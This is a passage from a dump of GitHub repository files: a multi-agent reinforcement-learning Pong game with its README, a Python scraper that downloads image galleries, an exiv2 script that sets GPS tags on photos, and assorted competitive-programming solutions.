requirements.txt\ncoverage==5.5\nfactory-boy==3.2.0\nfaker==8.7.0\npytest-celery==0.0.0\npytest-django==4.4.0\npytest-sugar==0.9.4\npytest==6.2.4\n" } ]
2
deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-
https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-
3da4c2105f20c9b4b8e5bc9fa122a9baca51f450
881ca4d55c84a68fb290fab3ab019c7e06100d50
7f1116f6cf6a2702f747448548cf3c62ed8d7cc3
refs/heads/master
2020-04-20T00:37:32.484517
2019-01-31T16:53:56
2019-01-31T16:53:56
168,525,624
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5019230842590332, "alphanum_fraction": 0.5398601293563843, "avg_line_length": 29.28877067565918, "blob_id": "82da8979a44b81aa3bad7e4f8b882338332bde45", "content_id": "d514ae6244d05cf41d5e6900b6d094db9ff52f0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5720, "license_type": "no_license", "max_line_length": 111, "num_lines": 187, "path": "/Pong2.py", "repo_name": "deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-", "src_encoding": "UTF-8", "text": "from numpy import random\nimport pygame, sys\nfrom pygame.locals import *\nimport pygame.surfarray as sarray\nimport numpy as np\n\nwhite = (255,255,255)\nblack = (0,0,0)\n\nwindow_width = 400\nwindow_height = 400\n\npaddle_width = 10\npaddle_height = 60\npaddle_buffer = 10 \n\nball_width = 10\nball_height = 10\n\npaddle_speed = 2\nball_x_speed = 3\nball_y_speed = 2\n\nscreen = pygame.display.set_mode((window_width, window_height))\n\n# Possible actions -1,0,1\n\nclass PongObject :\n def __init__(self, pos):\n self.pos = pos\n self.action = [0,1,0]\n self.score = 0\n def update_paddle(self, act):\n self.act = act\n sum = 0\n for i in range(0,3):\n if(self.act[i]==1):\n sum = i-1\n break\n \n self.pos[1] = self.pos[1] + sum*paddle_speed\n if(self.pos[1] < 0):\n self.pos[1] = 0\n if(self.pos[1] > window_height - paddle_height):\n self.pos[1] = window_height - paddle_height\n \nclass PongBall():\n def __init__(self, pos):\n self.pos = pos\n num = np.random.randint(1, 10)\n self.xdir = np.random.randint(-1, 2)\n self.ydir = np.random.randint(-1, 2)\n if(0 < num < 3):\n self.xdir = 1\n self.ydir = 1\n if (3 <= num < 5):\n self.xdir = -1\n self.ydir = 1\n if (5 <= num < 8):\n self.xdir = 1\n self.ydir = -1\n if (8 <= num < 10):\n self.xdir = -1\n self.ydir = -1\n \n def rest(self):\n num = np.random.randint(1, 10)\n self.xdir = np.random.randint(-1, 2)\n self.ydir = np.random.randint(-1, 2)\n if(0 < num < 3):\n self.xdir = 1\n self.ydir = 1\n if (3 <= num < 5):\n self.xdir = -1\n self.ydir = 1\n if (5 <= num < 8):\n self.xdir = 1\n self.ydir = -1\n if (8 <= num < 10):\n self.xdir = -1\n self.ydir = -1\n #def update_ball():\n #None\nclass PongGame():\n #metadata = {'render.modes' : ['human', 'rgb_array']} \n #Rect(left, top, width, height)\n def __init__(self):\n self.paddle1 = PongObject([paddle_buffer, window_height/2 - paddle_height/2])\n self.paddle2 = PongObject([window_width-paddle_buffer-paddle_width, window_height/2 - paddle_height/2])\n self.ball = PongBall([window_width/2 - ball_width/2, window_height/2 + ball_height/2])\n\n def reset_(self):\n self.paddle1 = PongObject([paddle_buffer, window_height/2 - paddle_height/2])\n self.paddle2 = PongObject([window_width-paddle_buffer-paddle_width, window_height/2 - paddle_height/2])\n self.ball = PongBall([window_width/2 - ball_width/2, window_height/2 + ball_height/2])\n self.ball.rest()\n self.step_([0,1,0], [0,1,0])\n \n def step_(self, act1, act2):\n\n self.paddle1.update_paddle(act1)\n self.paddle2.update_paddle(act2)\n\n pad1Ypos = self.paddle1.pos[1]\n pad2Ypos = self.paddle2.pos[1]\n \n #Update Ball\n ballXpos = self.ball.pos[0]\n ballYpos = self.ball.pos[1]\n\n ballXpos = ballXpos + self.ball.xdir * ball_x_speed\n ballYpos = ballYpos + self.ball.ydir * ball_y_speed\n\n #agent1\n if( ballXpos <= paddle_buffer + paddle_width and\n ballYpos + ball_height >= pad1Ypos and ballYpos - ball_height<= pad1Ypos + paddle_height):\n self.ball.xdir = 1\n self.paddle1.score+=1\n self.paddle2.score+=1\n #ballXpos = paddle_buffer + paddle_width\n\n elif(ballXpos <= 0):\n self.ball.xdir = 1\n self.paddle1.score-=1\n self.paddle2.score-=1\n\n #agent2\n if(ballXpos >= window_width - paddle_width - paddle_buffer and\n ballYpos + ball_height>=pad2Ypos and ballYpos - ball_height <= pad2Ypos + paddle_height):\n self.ball.xdir = -1\n self.paddle1.score+=1\n self.paddle2.score+=1\n #ballXpos = window_width - paddle_width - paddle_buffer - ball_width\n\n elif(ballXpos > window_width - ball_width):\n self.ball.xdir = -1\n self.paddle1.score-=1\n self.paddle2.score-=1\n\n #ball hits top\n if(ballYpos <=0):\n ballYpos = 0\n self.ball.ydir = 1\n #ball hits the bottom\n if(ballYpos >= window_height - ball_height):\n ballYpos = window_height - ball_height\n self.ball.ydir = -1\n\n self.ball.pos[0] = ballXpos\n self.ball.pos[1] = ballYpos\n\n screen2 = self.getFrame()\n \n return [screen2, self.paddle1.score, self.paddle2.score]\n \n\n def getFrame(self):\n pygame.event.pump()\n screen.fill(black)\n\n #draw paddle\n p1 = pygame.Rect(self.paddle1.pos[0], self.paddle1.pos[1],paddle_width, paddle_height)\n pygame.draw.rect(screen, white, p1)\n p2 = pygame.Rect(self.paddle2.pos[0], self.paddle2.pos[1], paddle_width, paddle_height)\n pygame.draw.rect(screen, white, p2)\n\n #draw ball\n bll = pygame.Rect(self.ball.pos[0], self.ball.pos[1], ball_width, ball_height)\n pygame.draw.rect(screen, white, bll)\n\n image_data = pygame.surfarray.array3d(pygame.display.get_surface())\n pygame.display.flip()\n return image_data\n'''\na = PongGame()\ni = 0\ntemp = a.reset_()\nfor i in range(10000):\n act1 = [0,0,0]\n act2 = [0,0,0]\n j = np.random.randint(-1,2)\n act1[j] = 1\n j = np.random.randint(-1,2)\n act2[j] = 1\n temp = a.step_(act1, act2)\n #print(a.paddle1.score,\" \",a.paddle2.score) \n'''\n\n\n\n \n \n \n \n \n" }, { "alpha_fraction": 0.7715979218482971, "alphanum_fraction": 0.7941645979881287, "avg_line_length": 117.54054260253906, "blob_id": "9793b95edb2a8085a3f125caccc04a46e1aa0d5d", "content_id": "9e960ddb8a65ce6f43fc66827cd0510673c04cf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4387, "license_type": "no_license", "max_line_length": 406, "num_lines": 37, "path": "/README.md", "repo_name": "deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-", "src_encoding": "UTF-8", "text": "# Reinforcement Learning in Multiagent system (pong game)\n\nIn this project my aim is to investigate if two agents are capable of interacting with each other in a pong environment and how they would coordinate with each other in order to not let the pong ball hit the vertical walls behind the paddles. These agents are trained by reinforcement learning technique.\n\n- [Multiagent Pong Game Environment (both agents can be controlled)](https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Pong2.py)\n- [Model for training both the agents simultaneously](https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/mlagent.ipynb)\n- Youtube Video - (https://www.youtube.com/watch?v=J3B3H2fU7jo)\n\n<img src = \"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/gif.gif\" height = \"300\" width =\"300\" href = \"https://www.youtube.com/watch?v=J3B3H2fU7jo\">\n\n\n## Building the game environment \n\n- The first and foremost requirement of the project was to build such a game environment in which I could control both the game playing agents (paddles in my case). For this I created a PongObject class and PongBall class for the two paddles (my learning agents) and the ball respectively. Both the classes had the initialization method in which their positions, action and initial score were initialized. \n\n- The PongObject class also had an update method which was used to update the position of the paddle according to the given action. The ball in the game environment was initially sent into a random direction and after that the game was played by the paddle.\n\n- The major class in the pong game was the PongGame class. It had 2 objects of the PongObject class namely paddle1 and paddle2 and one object of the PongBall class that is the ball.\n\n- The PongGame class has a step_() method which is used to take in action1 and action2 parameters. They are the actions provided by the model, to be given to the paddle1 and paddle2 objects. It also has the whole update method for the ball in the pong game as to how it will react in different situations depending upon the actions taken by the paddle.\n\n- Finally the score is also updated in this method according to the action and state of the paddle and ball. The PongGame class also has a getFrame() method which is used to return the current frame of the game screen to be used as state in our model. Also the step_() function returns the paddle1 and paddle2 score along with the frame after taking the given actions. \n\n### Game Environment\n<img src=\"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Screen%20Shot%202018-12-09%20at%208.12.27%20PM.png\" width=\"300\" hspace = 10> <img src=\"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Screen%20Shot%202018-12-09%20at%208.12.35%20PM.png\" width=\"300\">\n\n## Model for reinforcement learning\n\n- I used reinforcement learning method known as deep q learning for solving the above problem and developing a suitable model for the game. \n\n- In my network the input was a grayscale image of 84x84 size and 4 of them were stacked in order to give the correct representation of the state. They were passed to the network and finally a three value solution was obtained which corresponded to each of the action of the paddle that is go up, stay there and go down action. The maximum value between the \nthree was selected as the action to be taken. \n\n- I also used experience relay technique in which sample of each state, action, best action taken to maximise reward and reward were stored which were used to train my deep convolutional neural network. A random sample of batch of data was selected at each transition and was used to update the parameters of the network. \n\n- I also used exploration vs exploitation in which based on a certain probability the agent took a random action which was not the maximising reward action. This was done so that the agent does not get trapped in a local maxima and return erroneous actions. The probability of random action was decreased monotonically with time as the network learned better. The deep q learning model :-\n<img src=\"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Picture5.png\" width=\"400\" > \n" } ]
2
Zhang-Jikang/python_study
https://github.com/Zhang-Jikang/python_study
d8d290e021ce0225921125299c56d77230af4a65
bbe30658d30e183b44c313ccea3dd6ff5deb7a95
f9cc52acd0a6bc10aee3204bbd310ed1a19759da
refs/heads/master
2022-02-18T23:20:31.806131
2019-08-24T13:10:05
2019-08-24T13:10:05
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 25.33333396911621, "blob_id": "b4b9e010b7a81d910dc57687afdf0416ec6145b2", "content_id": "56a3f5d5f20396cc1e76902692279a89ebcb4d6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 95, "license_type": "no_license", "max_line_length": 46, "num_lines": 3, "path": "/README.md", "repo_name": "Zhang-Jikang/python_study", "src_encoding": "UTF-8", "text": "# python_study\na record during the process of studying python\n## 增加用xpath爬取的实例\n" }, { "alpha_fraction": 0.4896829426288605, "alphanum_fraction": 0.5520885586738586, "avg_line_length": 37, "blob_id": "2f55764221e5eada07434ee1ca9d910f0e95ea01", "content_id": "67be0bef89e39afa1c9d5e1943dc11a5efa56f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2065, "license_type": "no_license", "max_line_length": 147, "num_lines": 51, "path": "/mzitu_xpath.py", "repo_name": "Zhang-Jikang/python_study", "src_encoding": "UTF-8", "text": "import requests, os\r\nfrom lxml import etree\r\n\r\nburl = 'http://www.mzitu.com/mm/page/%s/'\r\n\r\nheaders = {\r\n 'Cookie': 'Hm_lvt_dbc355aef238b6c32b43eacbbf161c3c=1566636133; Hm_lpvt_dbc355aef238b6c32b43eacbbf161c3c=1566636133',\r\n 'Referer': 'http://www.mzitu.com/xinggan/',\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',\r\n}\r\n\r\nfor i in range(1, 32):\r\n url = burl % i\r\n response = requests.get(url, headers=headers)\r\n html_ele = etree.HTML(response.text)\r\n pins = html_ele.xpath('.//ul[@id=\"pins\"]/li')\r\n\r\n for abiaoqian in pins:\r\n\r\n aname = abiaoqian.xpath('./span[1]/a')[0].text # 获取一组图片的名字\r\n # print(aname)\r\n\r\n if not os.path.exists(aname):\r\n os.mkdir(aname) # 保存图片名字 创建文件夹\r\n\r\n tuurl = abiaoqian.xpath('./a/@href')[0] # 获取到一组图片的全部 url\r\n # print(tuurl)\r\n res = requests.get(tuurl, headers=headers)\r\n htmls = etree.HTML(res.text)\r\n\r\n url_max = htmls.xpath('//div[@class=\"pagenavi\"]/a/@href')[-2].split('/')[-1] # 获取图片最大页码数\r\n # print(url_max)\r\n\r\n for x in range(1, int(url_max) + 1):\r\n # print(x)\r\n htmltu = tuurl + '/%s' % x\r\n # print(htmltu)\r\n h1_ele = requests.get(htmltu, headers=headers)\r\n h2 = etree.HTML(h1_ele.text)\r\n tupiandizhi = h2.xpath('//div[@class=\"main-image\"]/p/a/img/@src')[0]\r\n # print(tupiandizhi)\r\n jpg_name = '{}/'.format(aname) + tupiandizhi.split('/')[-1]\r\n headerss = {\r\n 'Referer': tuurl,\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'\r\n }\r\n img = requests.get(tupiandizhi, headers=headerss)\r\n # print(img)\r\n with open(jpg_name, 'wb') as f:\r\n f.write(img.content)\r\n # print(jpg_name)" } ]
2
Igorjan94/CF
https://github.com/Igorjan94/CF
fbbda0037a866ebab33efe2db49b67302e420c37
816648a3a8e310e790e43b9c62a56ae6cc273844
ea3f27b607f017e6a975ddfa63c9d1eaa649c7ea
refs/heads/master
2023-08-08T19:13:14.785199
2023-08-08T18:44:22
2023-08-08T18:44:22
19,123,715
0
0
null
2014-04-24T20:52:42
2020-12-30T20:41:42
2020-12-30T20:41:40
C++
[ { "alpha_fraction": 0.5230769515037537, "alphanum_fraction": 0.6061538457870483, "avg_line_length": 28.545454025268555, "blob_id": "44cd1cef0952bc0231667416bca617d350caff6f", "content_id": "64e8147c837e6af048671bde6d30b8ab56446591", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 325, "license_type": "no_license", "max_line_length": 86, "num_lines": 11, "path": "/scripts/updateExif.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nlat=\"${1/[.,]/}\"\nlong=\"${2/[.,]/}\"\ncd \"$3\"\n\nexiv2 -v\\\n -M\"set Exif.GPSInfo.GPSLatitude $lat/1000000 0/1 0/1\"\\\n -M\"set Exif.GPSInfo.GPSLatitudeRef N\"\\\n -M\"set Exif.GPSInfo.GPSLongitude $long/1000000 0/1 0/1\"\\\n -M\"set Exif.GPSInfo.GPSLongitudeRef E\" *.JPG *JPEG *.jpg *.jpeg *.MOV *.MP4 *.TIF;\n" }, { "alpha_fraction": 0.4443882703781128, "alphanum_fraction": 0.45500504970550537, "avg_line_length": 37.03845977783203, "blob_id": "e4b45d6b6d0b2b7d26dcd332adaace9fac9c5316", "content_id": "becc63e5078c46eabd143eac4159c531bc4d2f45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1978, "license_type": "no_license", "max_line_length": 928, "num_lines": 52, "path": "/CodeForce/0285/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> l, r;\nvector<bool> b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n scanf(\"%I64d\", &x);\n if (x > 0 && x <= n)\n {\n if (b[x])\n l.push_back(-x);\n b[x] = true;\n } else\n {\n if (x <= 0)\n l.push_back(-x); else\n r.push_back(-x);\n }\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n int n, k;\n readln(n, k);\n for (int i = k + 1; i >= 1; i--)\n printf(\"%d%c\", i, ' ');\n for (int i = k + 2; i <= n; i++)\n printf(\"%d%c\", i, i == n ? '\\n' : ' ');\n return 0;\n}\n" }, { "alpha_fraction": 0.5615577697753906, "alphanum_fraction": 0.5801507830619812, "avg_line_length": 33.31034469604492, "blob_id": "06d64eac5316dd3bf631fb420b32b853c1270be0", "content_id": "c18ab81fffd280abae69e718d805cc4e295df51f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3980, "license_type": "no_license", "max_line_length": 163, "num_lines": 116, "path": "/CodeForce/1057/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n#define SZ(a) int(a.size())\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INF = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nstruct edge {\n\tint to, price, dist;\n\n bool operator<(edge const& b) const {\n return tuple(dist, price, to) < tuple(b.dist, b.price, b.to);\n }\n};\n\nvoid add_edge(vector<vector<edge>>& g, int from, int to, int price, int dist) {\n\tg[from].push_back({to, price, dist});\n}\n\nvoid run()\n{\n vector<vector<int>> d(2500, vector<int>(50, MOD));\n string a;\n queue<pii> q;\n\tints(n, start, k); --start;\n\tvector<int> r(n);\n\treadln(r, a);\n fori(n)\n d[r[i]][i] = abs(start - i),\n q.push({r[i], i});\n while (q.size())\n {\n auto [c, i] = q.front(); q.pop();\n forj(n)\n if (int temp = d[c][i] + abs(i - j); a[i] != a[j] && r[j] > r[i] && temp < d[c + r[j]][j])\n d[c + r[j]][j] = temp,\n q.push({c + r[j], j});\n }\n int ans = MOD;\n fori(n)\n FOR(j, k, 2500)\n ans = min(ans, d[j][i]);\n writeln(ans == MOD ? -1 : ans);\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&& a){cout<<\" \"<<a;}\nttti void priws(T&& a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3986014127731323, "alphanum_fraction": 0.4335664212703705, "avg_line_length": 13.300000190734863, "blob_id": "79f1e3aacfdb53ea7513ccfa91c2ece12596ef65", "content_id": "c43b65b6f6e48d0f1296afd2bcce75dd8e9bfa16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 33, "num_lines": 10, "path": "/CodeForce/0746/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a = int(input())\nb = int(input())\nc = int(input())\nx = 0\n\nfor i in range(a + 1):\n if i * 2 <= b and i * 4 <= c:\n x = i\n\nprint(x * 7)\n" }, { "alpha_fraction": 0.4659813940525055, "alphanum_fraction": 0.4867841303348541, "avg_line_length": 29.721803665161133, "blob_id": "8704ad92f835ee607868b648c8ad92ac69e7fa18", "content_id": "0fb6090c628e63e825fc86285fcc0f0810b6040b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4086, "license_type": "no_license", "max_line_length": 174, "num_lines": 133, "path": "/CodeForce/1349/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nstatic const int N = 1002001;\nvoid run()\n{\n int n, m, t;\n scanf(\"%d%d%d\", &n, &m, &t);\n bitset<N> x;\n auto get = [&](const bitset<N>& x, int i, int j) {\n return x[i * m + j];\n };\n auto set = [&](bitset<N>& x, int i, int j, bool y) {\n if (y)\n x.set(i * m + j);\n };\n fori(n)\n {\n string s(m, '0');\n scanf(\"%s\", s.data());\n forj(m)\n set(x, i, j, s[j] - '0');\n }\n unordered_map<bitset<N>, int> mp = {{x, 0}};\n\tvector<bitset<N>> v = {x};\n v.reserve(128);\n vector<pii> d = {{-1, 0}, {1, 0}, {0, -1}, {0, 1}};\n int cycle = -1;\n int start = -1;\n int index = 1;\n\twhile (true)\n\t{\n\t\tbitset<N> y;\n\t\tfori(n)\n\t\t\tforj(m)\n\t\t\t{\n int other = 0;\n bool color = get(x, i, j);\n for (const auto& [dx, dy]: d)\n if (int u = i + dx, v = j + dy; u >= 0 && u < n && v >= 0 && v < m && other == 0)\n other += get(x, u, v) == color;\n if (other == 0)\n set(y, i, j, color);\n else\n set(y, i, j, !color);\n\t\t\t}\n if (false)\n {\n writeln(index);\n fori(n)\n {\n forj(m)\n priws(get(y, i, j));\n writeln();\n }\n writeln();\n }\n v.pb(y);\n if (auto it = mp.find(y); it != mp.end())\n {\n cycle = index - it->second;\n start = it->second;\n break;\n }\n mp[y] = index++;\n x = y;\n\t}\n forn(q, t)\n {\n ll p;\n ll index;\n int i, j;\n scanf(\"%d%d%lld\", &i, &j, &p);\n if (p <= start)\n index = p;\n else\n index = (p - start) % cycle + start;\n //writeln(index);\n printf(\"%d\\n\", get(v[index], --i, --j));\n }\n}\n\n//{{{\nint main()\n{\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.37418708205223083, "alphanum_fraction": 0.39569786190986633, "avg_line_length": 19.397958755493164, "blob_id": "0b8d0cc520eac1b866c7e0d6567333d4186c57a0", "content_id": "e149294ed0dee55418c4a53d78ecc90027ce11e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1999, "license_type": "no_license", "max_line_length": 45, "num_lines": 98, "path": "/2022/yandexBackendQual/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ndef fromChar(c):\n if ord(c) < 65:\n return ord(c) - 48\n else:\n return ord(c) - 65 + 10\n\ndef cmp(s, t):\n ls = len(s)\n lt = len(t)\n if ls < lt:\n return True\n if ls > lt:\n return False\n for i in range(ls - 1, -1, -1):\n if s[i] < t[i]:\n return True\n return False\n\ndef get(s, t, b):\n vs = s[1:]\n vt = t[1:]\n if s[0] == t[0]:\n return [s[0]] + add(vs, vt, b)\n elif s[0] == '-':\n return sub(vt, vs, b)\n else:\n return sub(vs, vt, b)\n\ndef add(s, t, b):\n # print('ADD', s, t, b)\n ls = len(s)\n lt = len(t)\n ans = []\n carry = 0\n for i in range(max(ls, lt)):\n l = 0 if i >= ls else s[i]\n r = 0 if i >= lt else t[i]\n c = carry + l + r\n ans.append(c % b)\n carry = c // b\n if carry != 0:\n ans.append(carry)\n # print('RES', ans)\n return ans\n\ndef sub(s, t, b):\n # print('SUB', s, t, b)\n ans = ['+']\n if cmp(s, t):\n ans = ['-']\n s, t = t, s\n ls = len(s)\n lt = len(t)\n\n for i in range(max(ls, lt)):\n l = 0 if i >= ls else s[i]\n r = 0 if i >= lt else t[i]\n c = l - r\n if c < 0:\n s[i + 1] -= 1\n c += b\n ans.append(c)\n while len(ans) > 2 and ans[-1] == 0:\n ans.pop()\n\n # print('RES', ans)\n return ans\n\n\ndef calc(s, b):\n res = [['+', 0]]\n nxt = ['+']\n s += '+'\n for c in s:\n if c == '+' or c == '-':\n res.append([nxt[0]] + nxt[:0:-1])\n nxt = [c]\n else:\n cur = fromChar(c)\n if cur >= b:\n return False\n nxt.append(cur)\n # res.sort()\n for i in range(1, len(res)):\n res[0] = get(res[0], res[i], b)\n return res[0]\n\nl, r = input().replace(' ', '').split('=')\nfor b in range(2, 27 + 10):\n ll = calc(l, b)\n rr = calc(r, b)\n # print(b, ll, rr)\n if ll and rr and ll == rr:\n print(b)\n sys.exit()\nprint(-1)\n" }, { "alpha_fraction": 0.4026622176170349, "alphanum_fraction": 0.44592344760894775, "avg_line_length": 17.212121963500977, "blob_id": 